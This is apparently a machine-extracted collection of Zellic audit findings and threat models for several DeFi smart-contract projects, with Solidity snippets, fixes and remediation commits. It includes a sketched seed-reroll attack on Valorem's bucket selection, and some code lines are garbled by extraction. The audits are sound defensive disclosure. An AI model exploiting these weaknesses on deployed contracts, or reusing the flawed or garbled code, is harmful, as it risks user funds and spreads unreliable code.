(_deprecatedGauges.contains(gauge) || boost >= gaugeState.userGaugeBoost) { require(_userGauges[msg.sender].remove(gauge)); // Remove from set. Should never fail. delete getUserGaugeBoost[msg.sender][gauge]; } else { gaugeState.userGaugeBoost -= boost.toUint128(); } unchecked { i++; } } } The withdrawGaugeBoost call will revert if the current freeGaugeBoost number is less than the amount value despite the decrementAllGaugesBoost function call. function transfer(address to, uint256 amount) public override notAttached(msg.sender, amount) returns (bool) { ... } modifier notAttached(address user, uint256 amount) { if (freeGaugeBoost(user) < amount) revert AttachedBoost(); _; } function freeGaugeBoost(address user) public view returns (uint256) { return balanceOf[user] - getUserBoost[user]; } The function updateUserBoost should be called before the safeTransfer call. This issue was fixed by Maia DAO in commit ab968de.
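A minimal sketch of that ordering (assuming updateUserBoost takes the boost holder as an argument and recomputes getUserBoost, which is not spelled out in the audited snippet):
function withdrawGaugeBoost(address to, uint256 amount) external onlyOwner {
    hermesGaugeBoost.decrementAllGaugesBoost(amount);
    hermesGaugeBoost.updateUserBoost(address(this)); // refresh getUserBoost so freeGaugeBoost reflects the decrement
    address(hermesGaugeBoost).safeTransfer(to, amount);
}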
Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.12 Erroneous full value reset of _delegatesVotesCount", + "labels": [ + "Zellic" + ], + "body": "Target: ERC20Gauges Category: Coding Mistakes Likelihood: Medium Severity: Low : Low The _decrementVotesUntilFree function allows to release the required number of votes for transferring or burning. The amount of released votes is the minimum between the amount of votes assigned by the user to delegatee and number of unused votes of this delegatee. If this value is nonzero, the delegatee will be removed from the _delegate s[user] array and the _delegatesVotesCount[user][delegatee] will be reset to zero. function _decrementVotesUntilFree(address user, uint256 votes) internal { ...)) for (uint256 i = 0; i < size &) (userFreeVotes + totalFreed) < votes; i+)) { ...)) uint256 delegateVotes = _delegatesVotesCount[user][delegatee]; delegateVotes = FixedPointMathLib.min(delegateVotes, userUnusedVotes(delegatee)); if (delegateVotes !) 0) { totalFreed += delegateVotes; require(_delegates[user].remove(delegatee)); _delegatesVotesCount[user][delegatee] = 0; _writeCheckpoint(delegatee, _subtract, delegateVotes); emit Undelegation(user, delegatee, delegateVotes); } } ...)) } The userUnusedVotes(delegatee) function in this contract always returns a value that is equal to or greater than the _delegatesVotesCount[user][delegatee] variable. How- Zellic Maia DAO ever, the ERC20Gauges contract inherits from the ERC20MultiVotes contract and rewrites the userUnusedVotes function. As a result, during the execution of the transfer, transf erFrom, or burn functions, the userUnusedVotes function will return the current amount of unused votes minus the assigned amount of votes as weight, as shown below: function userUnusedVotes(address user) public view override returns (uint256) { return super.userUnusedVotes(user) - getUserWeight[user]; } This means that it is possible for the delegateVotes value to be less than the _delega tesVotesCount[user][delegatee] value, which could cause the values to be reset by mistake. We recommend decreasing the _delegatesVotesCount[user][delegatee] by delegat eVotes value and removing delegatee from the _delegates[user] only if the _delegat esVotesCount[user][delegatee] is equal to the delegateVotes value. This issue was fixed by Maia DAO in commit e7065d7. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.13 Lack of deleting a gauge from the getUserGaugeBoost", + "labels": [ + "Zellic" + ], + "body": "Target: ERC20Boost Category: Coding Mistakes Likelihood: Medium Severity: Low : Low The decrementGaugeBoost function allows the caller to remove an amount of boost from a gauge. A gauge is a contract that handles the distribution of rewards to users, attaching/detaching boost and accruing bribes for a strategy. The boost value allows users to increase their rewards. The user controls the gauge address and the boost amount but can only decrease the boost value connected with their address. If the current value of getUserGaugeBoost[msg.sender][gauge] is less than or equal to the value of boost, then the value will be deleted. The issue is that the gauge address should be removed from the _userGauges[msg.sen der] array as well. 
function decrementGaugeBoost(address gauge, uint256 boost) public { GaugeState storage gaugeState = getUserGaugeBoost[msg.sender][gauge]; if (boost >= gaugeState.userGaugeBoost) { delete getUserGaugeBoost[msg.sender][gauge]; } else { gaugeState.userGaugeBoost -= boost.toUint128(); } } The array _userGauges[msg.sender] will still contain the gauge address, and the userGauges function will mistakenly return this gauge address. Remove the gauge address from _userGauges[msg.sender]. function decrementGaugeBoost(address gauge, uint256 boost) public { GaugeState storage gaugeState = getUserGaugeBoost[msg.sender][gauge]; if (boost >= gaugeState.userGaugeBoost) { _userGauges[msg.sender].remove(gauge); delete getUserGaugeBoost[msg.sender][gauge]; } else { gaugeState.userGaugeBoost -= boost.toUint128(); } } This issue was fixed by Maia DAO in commit 059904f.", "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" }, { "title": "3.14 Incorrect initial optimizer ID", "labels": [ "Zellic" ], "body": "Target: OptimizerFactory Category: Coding Mistakes Likelihood: High Severity: Low Impact: Low When creating a new optimizer with the OptimizerFactory, the assigned ID is equal to the length of the optimizer array: function createTalosOptimizer( uint32 _twapDuration, int24 _maxTwapDeviation, int24 _tickRangeMultiplier, uint24 _pricePercentage, uint256 _maxTotalSupply, address owner ) external { TalosOptimizer optimizer = new TalosOptimizer( _twapDuration, _maxTwapDeviation, _tickRangeMultiplier, _pricePercentage, _maxTotalSupply, owner ); optimizerIds[optimizer] = optimizers.length; optimizers.push(optimizer); } For the first optimizer created, this will be zero as the array has no values. This means that the optimizer will not be able to be used by the TalosBaseStrategyFactory as it has a check to see if the ID of the optimizer is zero: function createTalosBaseStrategy( IUniswapV3Pool pool, ITalosOptimizer optimizer, address strategyManager, bytes memory data ) external { if (optimizerFactory.optimizerIds(TalosOptimizer(address(optimizer))) == 0) revert UnrecognizedOptimizer(); TalosBaseStrategy strategy = createTalosV3Strategy(pool, optimizer, strategyManager, data); strategyIds[strategy] = strategies.length; strategies.push(strategy); } The first optimizer created by the OptimizerFactory cannot be used by the TalosBaseStrategyFactory because the optimizer ID will be zero and cause a revert. The new optimizer should be pushed to the optimizers array before optimizerIds is updated so that the first optimizer receives an ID of one. This issue was fixed by Maia DAO in commit 5448551.", "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" }, { "title": "3.1 Bucket for exercise() manipulatable with small exercise() calls", "labels": [ "Zellic" ], "body": "Target: OptionSettlementEngine Category: Business Logic Likelihood: Medium Severity: High Impact: Medium The first bucket to be exercised in an exercise() call is based on a deterministic seed. This seed is reset upon every exercise() call. The seed can be intentionally reset by exercise()ing with a small amount. If the seed is repeatedly reset until the desired bucket is next in line, the next bucket to be exercised can effectively be chosen this way. 
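Conceptually, the attack is a reroll loop. The following is purely illustrative; predictedFirstBucket is a hypothetical helper that mimics settlementSeed % numUnexercisedBuckets, and the exercise() amounts are arbitrary:
// keep rerolling the seed with dust-sized exercises until the desired bucket is first in line
while (predictedFirstBucket(optionId) != desiredBucket) {
    engine.exercise(optionId, 1); // each call resets optionRecord.settlementSeed
}
engine.exercise(optionId, remainingAmount); // now drawn against the chosen bucket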
The code to choose buckets and exercise is as follows: function _assignExercise(OptionTypeState storage optionTypeState, Option storage optionRecord, uint112 amount) private { // Setup pointers to buckets and buckets with collateral available for exercise. // ... uint96 numUnexercisedBuckets = uint96(unexercisedBucketIndices.length); uint96 exerciseIndex = uint96(optionRecord.settlementSeed % numUnexercisedBuckets); while (amount > 0) { // ... if (amount != 0) { exerciseIndex = (exerciseIndex + 1) % numUnexercisedBuckets; } } // Update the seed for the next exercise. optionRecord.settlementSeed = uint160(uint256(keccak256(abi.encode(optionRecord.settlementSeed, exerciseIndex)))); } A user who owns options can effectively choose the next bucket to be exercised for that option category. This can be used to reduce the exercise priority of one\u2019s own options or force some specific bucket of options to be preferentially exercised. Reset the settlementSeed only if at least one bucket is exhausted. The settlementSeed is now only randomized for the first bucket. It was fixed in commit 1d6c08b43.", "html_url": "https://github.com/Zellic/publications/blob/master/Valorem Options - Zellic Audit Report.pdf" }, { "title": "3.2 Probability of bucket exercise() not correlated with size", "labels": [ "Zellic" ], "body": "Target: OptionSettlementEngine Category: Business Logic Likelihood: N/A Severity: Medium Impact: Medium The probability of an options bucket being chosen for exercise() is not correlated with the number of options contained in that bucket. Individual options in smaller buckets have a higher probability of being chosen for exercise. The first bucket to be exercised per exercise() call is chosen pseudorandomly with uniform probability for all buckets as follows: uint96 numUnexercisedBuckets = uint96(unexercisedBucketIndices.length); uint96 exerciseIndex = uint96(optionRecord.settlementSeed % numUnexercisedBuckets); Since the probability of exercise is not normalized by bucket size, options in smaller buckets have a higher expected amount exercised per option. If writing a small amount of options, this can be disadvantageous if unable to write into a larger bucket. Base the probability of a bucket being chosen on the size of the bucket or some other criterion to ensure fairness.
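For illustration, one such criterion is to weight the draw by bucket size, walking the cumulative amounts (a sketch only; the buckets array and amountInBucket field are assumed, and this is not Valorem\u2019s implementation):
uint256 total;
for (uint96 i = 0; i < numUnexercisedBuckets; i++) {
    total += buckets[unexercisedBucketIndices[i]].amountInBucket;
}
uint256 target = optionRecord.settlementSeed % total;
uint96 exerciseIndex;
for (uint96 i = 0; i < numUnexercisedBuckets; i++) {
    uint256 size = buckets[unexercisedBucketIndices[i]].amountInBucket;
    if (target < size) { exerciseIndex = i; break; } // selection probability proportional to bucket size
    target -= size;
}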
Since the commit 1d6c08b43, only the first bucket to be exercised is random. Since the number of randomizations is now vastly reduced, the bias of the uneven randomization has been drastically improved, although the choice of first bucket is still biased. Valorem Labs Inc plans to fully remediate this in a future version.", "html_url": "https://github.com/Zellic/publications/blob/master/Valorem Options - Zellic Audit Report.pdf" }, { "title": "4.1 Module: ExternalLiquidationStrategy.sol Function: _liquidateExternally(uint256 tokenId, uint128[] amounts, uint256 lpTokens, address to, byte[] data) Allows any caller to liquidate the existing loan using a flash loan of collateral tokens from the pool and/or CFMM LP tokens. Before the liquidation, the externalSwap function will be called. After that, a check will be made that enough tokens have been deposited. Allows only full liquidation of the loan. Inputs", "labels": [ "Zellic" ], "body": " tokenId \u2013 Validation: There is no verification that the corresponding _loan for this tokenId exists. \u2013 Impact: A tokenId referring to an existing _loan. It is not necessary that msg.sender is the owner of the _loan, so the caller can choose any existing loan. amounts \u2013 Validation: There is a check that amount <= s.TOKEN_BALANCE inside the externalSwap->sendAndCalcCollateralLPTokens->sendToken function. \u2013 Impact: Amount of tokens from the pool to flash loan. lpTokens \u2013 Validation: There is a check that lpTokens <= s.LP_TOKEN_BALANCE inside the externalSwap->sendCFMMLPTokens->sendToken function. \u2013 Impact: Amount of CFMM LP tokens being flash loaned. to \u2013 Validation: Cannot be zero address. \u2013 Impact: Address that will receive the collateral tokens and/or lpTokens in flash loan. data \u2013 Validation: No checks. \u2013 Impact: Custom user data. It is passed to the externalCall. Branches and code coverage (including function calls) The tests for this part of _liquidateExternally are skipped. Intended branches [ ] Check that loan was fully liquidated. Negative behavior [x] _loan for tokenId does not exist. [ ] Balance of contract not enough to transfer amounts. [ ] Balance of contract not enough to transfer lpTokens. [ ] Zero to address. [x] After externalCall, the s.cfmm balance of contract has not returned to the previous value. [ ] After externalCall, the balance of contract for each of the tokens has not returned to the previous value. Function call analysis externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> sendAndCalcCollateralLPTokens(to, amounts, lastCFMMTotalSupply) -> sendToken(IERC20(tokens[i]), to, amounts[i], s.TOKEN_BALANCE[i], type(uint128).max) -> GammaSwapLibrary.safeTransfer(token, to, amount) \u2013 External/Internal? External. \u2013 Argument control? to and amount. \u2013 Impact: The caller can transfer any number of tokens that is less than s.TOKEN_BALANCE[i], but they must return the same or a larger amount after the externalCall function call; it will be checked inside the updateCollateral function. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> sendCFMMLPTokens(_cfmm, to, lpTokens) -> sendToken(IERC20(_cfmm), to, lpTokens, s.LP_TOKEN_BALANCE, type(uint256).max) -> GammaSwapLibrary.safeTransfer(token, to, amount) \u2013 External/Internal? External. \u2013 Argument control? to and amount.
But if the balance was decreased, the withdrawn value will be checked that it is no more than tokensHeld[i] (available collateral) and the _loan.t okensHeld and s.TOKEN_BALANCE will be increased. payLoanAndRefundLiquidator(tokenId, tokensHeld, loanLiquidity, 0, true) - > GammaSwapLibrary.safeTransfer(IERC20(s.cfmm), msg.sender, lpRefund); \u2013 External/Internal? External. \u2013 Argument control? No. \u2013 : The user should not control the lpRefund value. Transfer the re- maining part of CFMMLPTokens.", + "html_url": "https://github.com/Zellic/publications/blob/master/GammaSwap V1 Core and Implementations (March, 2023) - Zellic Audit Report.pdf" + }, + { + "title": "4.2 Module: ExternalLongStrategy.sol Function: _rebalanceExternally(uint256 tokenId, uint128[] amounts, uint 256 lpTokens, address to, byte[] data) Allows the loan\u2019s creator to use a flash loan and also rebalance a loan\u2019s collateral. Inputs", + "labels": [ + "Zellic" + ], + "body": "tokenId \u2013 Validation: There is a check inside the _getLoan function that msg.sender is creator of loan. \u2013 : A tokenId refers to an existing _loan, which will be rebalancing. amounts Zellic GammaSwap \u2013 Validation: There is a check that amount <= s.TOKEN_BALANCE inside externa lSwap->sendAndCalcCollateralLPTokens->sendToken function. \u2013 : Amount of tokens from the pool to flash loan. lpTokens \u2013 Validation: There is a check that lpTokens <= s.LP_TOKEN_BALANCE inside ex ternalSwap->sendCFMMLPTokens->sendToken function. \u2013 : Amount of CFMM LP tokens being flash loaned. to \u2013 Validation: Cannot be zero address. \u2013 : Address that will receive the collateral tokens and/or lpTokens in flash loan. data \u2013 Validation: No checks. \u2013 : Custom user data. It is passed to the externalCall. Branches and code coverage (including function calls) Intended branches 4\u25a1 lpTokens !) 0. \u25a1 amounts is not empty. 4\u25a1 amounts is not empty and lpTokens !) 0. 4\u25a1 Withdraw one of the tokens by no more than the available number of tokens. 4\u25a1 Withdraw both tokens by no more than the available number of tokens. 4\u25a1 Deposit one of the tokens. 4\u25a1 Deposit both tokens. 4\u25a1 Deposit one token and withdraw another. Negative behavior 4\u25a1 _loan for tokenId does not exist. \u25a1 msg.sender is not creator of the _loan. \u25a1 Balance of contract is not enough to transfer amounts. \u25a1 Balance of contract is not enough to transfer lpTokens. \u25a1 Zero to address. \u25a1 After externalCall, the s.cfmm balance of the contract has not returned to the previous value. \u25a1 After externalCall, the balance of the contract for each tokens has not returned to the previous value. \u25a1 After externalCall, the balance of the contract for one of tokens has not re- turned to the previous value. Zellic GammaSwap 4\u25a1 Withdraw one of the tokens, and loan is undercollateralized after externalCall. 4\u25a1 Withdraw both tokens, and loan is undercollateralized after externalCall. 4\u25a1 Withdraw one of the tokens and deposit another, and loan is undercollateralized after externalCall. \u25a1 The amounts and tokenId are zero. Function call analysis externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> sendAndCalcCo llateralLPTokens(to, amounts, lastCFMMTotalSupply) -> sendToken(IERC20(to kens[i]), to, amounts[i], s.TOKEN_BALANCE[i], type(uint128).max) -> Gamma SwapLibrary.safeTransfer(token, to, amount) \u2013 External/Internal? External. \u2013 Argument control? to and amount. 
\u2013 : The caller can transfer any number of tokens that is less than s.TO KEN_BALANCE[i], but they must return the same or a larger amount after the externalCall function call; it will be checked inside the updateCollateral function. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> sendCFMMLPTok ens(_cfmm, to, lpTokens) -> sendToken(IERC20(_cfmm), to, lpTokens, s.LP_T OKEN_BALANCE, type(uint256).max) -> GammaSwapLibrary.safeTransfer(token, t o, amount) \u2013 External/Internal? External. \u2013 Argument control? to and amount. \u2013 : The caller can transfer any number of tokens that is less than s. LP_TOKEN_BALANCE, but they must return the same or a larger amount after the externalCall function call; it will be checked inside the checkLPTokens function. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> IExternalCall ee(to).externalCall(msg.sender, amounts, lpTokens, data); \u2013 External/Internal? External. \u2013 Argument control? msg.sender, amounts, lpTokens, and data. \u2013 : The reentrancy is not possible because the other important exter- nal functions have lock. If caller does not return enough amount of tokens, the transaction will be reverted. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> updateCollate ral(_loan) -> GammaSwapLibrary.balanceOf(IERC20(tokens[i]), address(this) ); -> address(_token).staticcall(abi.encodeWithSelector(_token.balanceOf. selector, _address)) \u2013 External/Internal? External. Zellic GammaSwap \u2013 Argument control? No. \u2013 : Return the current token balance of this contract. This balance will be compared with the last tokenBalance[i] value; if the balance was in- creased, the _loan.tokensHeld and s.TOKEN_BALANCE will be increased too. But if the balance was decreased, the withdrawn value will be checked that it is no more than tokensHeld[i] (available collateral) and the _loan.t okensHeld and s.TOKEN_BALANCE will be increased. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> checkLPTokens (_cfmm, prevLpTokenBalance, lastCFMMInvariant, lastCFMMTotalSupply) -> Ga mmaSwapLibrary.balanceOf(IERC20(_cfmm), address(this)) \u2013 External/Internal? External. \u2013 Argument control? No. \u2013 : Return the current _cfmm balance of this contract. This new balance will be compared with the balance before the externalCall function call, and if new value is less, the transaction will be reverted. Also, update the s.LP_TOKEN_BALANCE and s.LP_INVARIANT. Zellic GammaSwap 5 Audit Results At the time of our audit, the code was not deployed to mainnet EVM. During our audit, we discovered one finding that was informational in nature. Gam- maSwap acknowledged the finding and implemented a fix.", + "html_url": "https://github.com/Zellic/publications/blob/master/GammaSwap V1 Core and Implementations (March, 2023) - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Add Length Validation for callData in validateSessionUserO p", + "labels": [ + "Zellic" + ], + "body": "Target: ERC20SessionValidationModule Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational In the validateSessionUserOp function, the length check for op.callData is incomplete, and there may be callData with illegal length. 
function validateSessionUserOp( UserOperation calldata _op, bytes32 _userOpHash, bytes calldata _sessionKeyData, bytes calldata _sessionKeySignature ) external pure override returns (bool) { ... // working with userOp.callData // check if the call is to the allowed recipient and amount is not more than allowed bytes calldata data; { uint256 offset = uint256(bytes32(_op.callData[4 + 64:4 + 96])); uint256 length = uint256( bytes32(_op.callData[4 + offset:4 + offset + 32]) ); // we expect data to be the `IERC20.transfer(address, uint256)` calldata data = _op.callData[4 + offset + 32:4 + offset + 32 + length]; } if (address(bytes20(data[16:36])) != recipient) { revert(\u201dERC20SV Wrong Recipient\u201d); } if (uint256(bytes32(data[36:68])) > maxAmount) { revert(\u201dERC20SV Max Amount Exceeded\u201d); } return ECDSA.recover( ECDSA.toEthSignedMessageHash(_userOpHash), _sessionKeySignature ) == sessionKey; } Data without length restrictions may lead to issues such as hash collisions. A hash collision may lead to the ability to arbitrarily forge user messages. Use abi.decode to get the message length and add a maximum length check on op.callData.
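As an illustrative sketch of such a bound (68 bytes matches IERC20.transfer(address,uint256) calldata, that is, a 4-byte selector plus two 32-byte words; the revert string is hypothetical):
uint256 length = uint256(bytes32(_op.callData[4 + offset:4 + offset + 32]));
if (length != 68) {
    revert(\u201dERC20SV Invalid Calldata Length\u201d); // reject over- or under-sized transfer calldata
}
data = _op.callData[4 + offset + 32:4 + offset + 32 + length];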
This issue has been acknowledged by Biconomy Labs, and a fix was implemented in commit 3bf128e9.", "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Batched Session Router Module - Zellic Audit Report.pdf" }, { "title": "3.2 Missing element count check of sessionData in validateUserOp", "labels": [ "Zellic" ], "body": "Target: BatchedSessionRouter Category: Coding Mistakes Likelihood: N/A Severity: Informational Impact: Informational The function validateUserOp decodes an array named sessionData and iterates over it to perform various validations and computations. However, there is no explicit check in the code to ensure that the sessionData array contains at least one element. ( address sessionKeyManager, SessionData[] memory sessionData, bytes memory sessionKeySignature ) = abi.decode( moduleSignature, (address, SessionData[], bytes) ); ... uint256 length = sessionData.length; // iterate over batched operations for (uint i; i < length; ) { ... } return ( _packValidationData( false, // sig validation failed = false; if we are here, it is valid earliestValidUntil, latestValidAfter ) ); The absence of a check for the array length could lead to potential logical errors or undesired behaviors in the case where the sessionData array is empty. Implement the array length check and make sure the length of sessionData is equal to the length of destinations. This issue has been acknowledged by Biconomy Labs, and a fix was implemented in commit 3bf128e9.", "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Batched Session Router Module - Zellic Audit Report.pdf" }, { "title": "3.3 Missing test suite code coverage", "labels": [ "Zellic" ], "body": "Target: BatchedSessionRouter, ERC20SessionValidationModule, SessionKeyManagerModule Category: Code Maturity Likelihood: Low Severity: Low Impact: Low In our assessment of Biconomy Batched Session Router Module\u2019s test suite, we observed that while it provides adequate coverage for many aspects of the codebase, there are specific branches and codepaths that appear to be under-tested or not covered at all. Some functions in the smart contract are not covered by any unit or integration tests, to the best of our knowledge. The following functions do not have full test coverage: BatchedSessionRouter.sol: validateUserOp. ERC20SessionValidationModule.sol: validateSessionParams. SessionKeyManagerModule.sol: validateSessionKey. Because correctness is so critical when developing smart contracts, we always recommend that projects strive for 100% code coverage. Testing is an essential part of the software development life cycle. No matter how simple a function may be, untested code is always prone to bugs. Expand the test suite so that all functions are covered by unit or integration tests. This issue has been acknowledged by Biconomy Labs, and a fix was implemented in commit 12037aff. 4 Threat Model This provides a full threat model description for various functions. As time permitted, we analyzed each function in the modules and created a written threat model for some critical functions. A threat model documents a given function\u2019s externally controllable inputs and how an attacker could leverage each input to cause harm. Not all functions in the audit scope may have been modeled. The absence of a threat model in this section does not necessarily suggest that a function is safe.", "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Batched Session Router Module - Zellic Audit Report.pdf" }, { "title": "4.1 Module: BatchedSessionRouterModule.sol Function: validateUserOp(UserOperation userOp, byte[32] userOpHash) Validates userOperation. Inputs", "labels": [ "Zellic" ], "body": " userOp \u2013 Control: Full. \u2013 Constraints: Needs to contain a valid selector. \u2013 Impact: User Operation to be validated. If invalid, the function will revert or return a failure code. userOpHash \u2013 Control: Full. \u2013 Constraints: Must be a valid 32-byte hash representation of the corresponding userOp. \u2013 Impact: Hash of the User Operation to be validated. Acts as a unique identifier or checksum of the User Operation. Branches and code coverage (including function calls) Intended branches Function returns SIG_VALIDATION_SUCCESS for a valid UserOp and valid userOpHash. [x] Test coverage Function returns SIG_VALIDATION_FAILED if the userOp was signed with an improper session key. [x] Test coverage Negative behavior Function reverts when userOp.sender is an unregistered smart contract. [x] Negative test Function reverts when the length of user.signature is less than 65. [x] Negative test", "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Batched Session Router Module - Zellic Audit Report.pdf" }, { "title": "4.2 Module: ERC20SessionValidationModule.sol Function: validateSessionParams(address destinationContract, uint256 callValue, byte[] _funcCallData, byte[] _sessionKeyData, byte[] None) This validates that the call (destinationContract, callValue, and funcCallData) complies with the Session Key permissions represented by sessionKeyData. Inputs", "labels": [ "Zellic" ], "body": " destinationContract \u2013 Control: Full. \u2013 Constraints: Must match the token address specified in _sessionKeyData. \u2013 Impact: The address of the contract to be called. callValue \u2013 Control: Full. \u2013 Constraints: Must be zero in value, as nonzero values will result in a revert. \u2013 Impact: The value to be sent with the call. _funcCallData \u2013 Control: Full. \u2013 Constraints: Must adhere to the ERC-20 standard. \u2013 Impact: The data for the call. It is parsed inside the SVM. 
_sessionKeyData \u2013 Control: Full. \u2013 Constraints: Must contain valid session key data that represents session key permissions. \u2013 Impact: SessionKey data that describes sessionKey permissions. None \u2013 Control: Full. \u2013 Constraints: N/A. \u2013 Impact: N/A. Branches and code coverage (including function calls) Intended branches Function returns the session key for a valid destinationContract, callValue, and _funcCallData that matches _sessionKeyData. [x] Test coverage Negative behavior Function reverts with ERC20SV Invalid Token when destinationContract does not match the token address in _sessionKeyData. [x] Negative test Function reverts with ERC20SV Non Zero Value when a nonzero callValue is provided. [x] Negative test Function reverts with ERC20SV Wrong Recipient when the recipient in _funcCallData does not match the intended recipient from _sessionKeyData. [x] Negative test Function reverts with ERC20SV Max Amount Exceeded when the amount specified in _funcCallData exceeds the maxAmount described in _sessionKeyData. [x] Negative test", "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Batched Session Router Module - Zellic Audit Report.pdf" }, { "title": "4.3 Module: SessionKeyManagerModule.sol Function: setMerkleRoot(byte[32] _merkleRoot) Sets the Merkle root of a tree containing session keys for msg.sender. Inputs", "labels": [ "Zellic" ], "body": " _merkleRoot \u2013 Control: Full. \u2013 Constraints: N/A. \u2013 Impact: The Merkle root of a tree that contains session keys with their permissions and parameters. Branches and code coverage (including function calls) Intended branches Should successfully set the Merkle root of a tree containing session keys for msg.sender. [x] Test coverage Function: validateSessionKey(address smartAccount, uint48 validUntil, uint48 validAfter, address sessionValidationModule, byte[] sessionKeyData, byte[32][] merkleProof) Validates that the Session Key and parameters are enabled by being included in the Merkle tree. Inputs smartAccount \u2013 Control: Full. \u2013 Constraints: Must be a valid Ethereum address. \u2013 Impact: The smartAccount for which the session key is being validated. validUntil \u2013 Control: Full. \u2013 Constraints: N/A. \u2013 Impact: The timestamp when the session key expires. validAfter \u2013 Control: Full. \u2013 Constraints: N/A. \u2013 Impact: The timestamp when the session key becomes valid. sessionValidationModule \u2013 Control: Full. \u2013 Constraints: Must be a valid contract address. \u2013 Impact: The address of the Session Validation Module. sessionKeyData \u2013 Control: Full. \u2013 Constraints: N/A. \u2013 Impact: The session parameters (limitations/permissions). merkleProof \u2013 Control: Full. \u2013 Constraints: N/A. \u2013 Impact: The Merkle proof for the leaf that represents this session key and params. Branches and code coverage (including function calls) Intended branches Function successfully fetches the session key storage for the provided smart account. [x] Test coverage Negative behavior Function reverts with SessionNotApproved due to invalid session key (data). [x] Negative test Function call analysis rootFunction -> verify(bytes32[], bytes32, bytes32) \u2013 What is controllable?: merkleProof, smartAccount, validUntil, validAfter, sessionValidationModule, and sessionKeyData. \u2013 If return value controllable, how is it used and how can it go wrong?: It is used to verify the proof. 
\u2013 What happens if it reverts, reenters, or does other unusual control flow?: N/A. Function: validateUserOp(UserOperation userOp, byte[32] userOpHash) Validates userOperation. Inputs userOp \u2013 Control: Full. \u2013 Constraints: N/A. \u2013 Impact: User Operation to be validated. userOpHash \u2013 Control: Full. \u2013 Constraints: Must be a valid 32-byte hash representation of the corresponding userOp. \u2013 Impact: Hash of the User Operation to be validated. Branches and code coverage (including function calls) Intended branches Function is successfully invoked. [x] Test coverage Negative behavior Function reverts with SIG_VALIDATION_FAILED. [x] Negative test Should revert with wrong session key data. [x] Negative test Should revert with the wrong session validation module address. [x] Negative test Should revert if session key is already expired. [x] Negative test Should revert if session key is not yet valid. [x] Negative test Should revert with wrong validAfter. [x] Negative test Should revert with wrong validUntil. [x] Negative test Should revert if signed with a session key that is not in the Merkle tree. [x] Negative test Function call analysis rootFunction -> _getSessionData(address) \u2013 What is controllable?: N/A. \u2013 If return value controllable, how is it used and how can it go wrong?: N/A. \u2013 What happens if it reverts, reenters, or does other unusual control flow?: N/A. rootFunction -> validateSessionKey(address, uint48, uint48, address, byte[], byte[32][]) \u2013 What is controllable?: userOp. \u2013 If return value controllable, how is it used and how can it go wrong?: N/A. \u2013 What happens if it reverts, reenters, or does other unusual control flow?: N/A. rootFunction -> _packValidationData(bool, uint48, uint48) \u2013 What is controllable?: userOp and userOpHash. \u2013 If return value controllable, how is it used and how can it go wrong?: True for signature failure, false for success. \u2013 What happens if it reverts, reenters, or does other unusual control flow?: N/A. 5 Assessment Results At the time of our assessment, the reviewed code was not deployed to the Ethereum Mainnet. During our assessment of the scoped Biconomy Batched Session Router Module modules, we discovered three findings. No critical issues were found. One finding was of low impact, and the other findings were informational in nature. Biconomy Labs acknowledged all findings and implemented fixes.", "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Batched Session Router Module - Zellic Audit Report.pdf" }, { "title": "3.1 Unexpected reverts where overflow may be desirable", "labels": [ "Zellic" ], "body": "Target: UniswapTwapPriceOracleV2, UniswapTwapPriceOracleV2Root Category: Business Logic Likelihood: High Severity: Medium Impact: High The UniswapTwapPriceOracleV2 is a modified version of the Compound UniswapTwapPriceOracleV2 contract. The Compound contract used Open Zeppelin\u2019s SafeMathUpgradeable to check for arithmetic overflow and underflow issues. Ionic Protocol removed SafeMathUpgradeable and modified the Compound contracts to compile with solidity versions >=0.8.0, which by default includes checked arithmetic to revert on overflows and underflows. The UniswapTwapPriceOracleV2 imports UniswapTwapPriceOracleV2Root, which has also been modified to replace the SafeMathUpgradeable functionality with solidity 0.8.0+ default checked arithmetic. 
However, in UniswapTwapPriceOracleV2Root there are portions of code related to price accumulation (currentPx0Cumu, currentPx1Cumu) and time-weighted average price (price0TWAP, price1TWAP) where arithmetic overflow is desirable. For further reading, see Dapp\u2019s audit report of Uniswap v2. This issue was duplicated with a parallel, internal review of the code conducted by Ionic Protocol. When calling getUnderlyingPrice, an overflow in either currentPx0Cumu or currentPx1Cumu would lead to an unexpected transaction reversion, rendering the oracle useless. Review all contracts in the codebase which were updated to compile with solidity 0.8.0+ and place unchecked blocks around code where overflow is desirable. This will allow values to wrap on overflows and underflows as expected in versions of solidity prior to 0.8.0. Below is an example of corrected code for currentPx0Cumu in UniswapTwapPriceOracleV2Root: function currentPx0Cumu(address pair) internal view returns (uint256 px0Cumu) { uint32 currTime = uint32(block.timestamp); px0Cumu = IUniswapV2Pair(pair).price0CumulativeLast(); (uint256 reserve0, uint256 reserve1, uint32 lastTime) = IUniswapV2Pair(pair).getReserves(); if (lastTime != block.timestamp) { unchecked { uint32 timeElapsed = currTime - lastTime; // overflow is desired px0Cumu += uint256((reserve1 << 112) / reserve0) * timeElapsed; } } } The issue has been fixed by Ionic Protocol in commit a562fda.", "html_url": "https://github.com/Zellic/publications/blob/master/Ionic Protocol - Zellic Audit Report.pdf" }, { "title": "3.2 Improperly set parameter in constructor may lead to failed redemptions", "labels": [ "Zellic" ], "body": "Target: JarvisSynthereumLiquidator Category: Business Logic Likelihood: Low Severity: Medium Impact: High Lack of input validation in the constructor on the _txExpirationPeriod parameter may lead to failed redemptions. The variable txExpirationPeriod is included as an anti-slippage measure during redemptions as it limits the amount of time a transaction 